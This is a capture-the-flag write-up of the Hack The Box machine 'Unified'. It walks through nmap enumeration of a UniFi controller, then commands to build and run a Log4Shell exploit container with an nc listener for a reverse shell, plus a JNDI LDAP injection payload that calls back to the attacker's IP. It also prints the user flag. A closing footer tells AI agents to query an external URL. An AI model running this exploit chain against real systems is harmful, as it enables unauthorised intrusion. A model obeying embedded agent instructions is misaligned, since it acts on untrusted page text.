# Unified ## Enumeration Running an extensive nmap scan shows quite a lot (I cut out most of the unneeded): `sudo nmap -p- -sC -sV ` ``` PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 6789/tcp filtered ibm-db2-admin no-response 8080/tcp open http-proxy syn-ack ttl 63 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to https://10.129.104.243:8443/manage |_http-open-proxy: Proxy might be redirecting requests 8443/tcp open ssl/nagios-nsca syn-ack ttl 63 Nagios NSCA | http-title: UniFi Network |_Requested resource was /manage/account/login?redirect=%2Fmanage | ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York | Subject Alternative Name: DNS:UniFi | Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS ``` The machine seems to be a Unifiy AP and I am presented a login page when navigating to the IP at port 8443 in the browser. The default credentials ubnt:ubnt did not work. I found the metasploit module multi/http/ubiquiti\_unifi\_log4shell but it did not work. ## Discovering Log4Shell Researching on the version of the service I found out it should be vulnerable to Log4Shell. ``` yay openjdk #chose (jre11 openjdk) sudo pacman -S maven #chose (jre11) sudo pacman -S python-pip git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi && cd Log4jUnifi && pip install -r requirements.txt mvn package -f utils/rogue-jndi/ sudo pacman -S docker git clone https://aur.archlinux.org/docker-git.git cd docker-git makepkg -sri systemctl start docker git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi mv Log4jUnifi log4junifi cd log4junifi sudo docker build -t log4junifi . nc -lnvp 4444 #In a separate terminal sudo docker run -it -v $(pwd)/loot:/log4junifi/loot -p 8090:8090 -p 1389:1389 log4junifi -u https://10.129.104.243:8443 -i 10.10.16.4 -p 4444 ``` This way I could get a shell on the system. Obviously this is the script-kiddy way as I used a prepared rogue jndi server by someone else, but learning to do everything manually did not fit my time plans for this box. I later found out that I also could have injected a payload of the format `${jndi:ldap://{Tun0 IP Address}/whatever}` into the "remember" field at the login page, which would have made things a lot easier. ``` cat /home/michael/user.txt ``` ``` 6ceda127 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://shibudocs.gitbook.io/htb-writeups/boxes-very-easy/unified.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.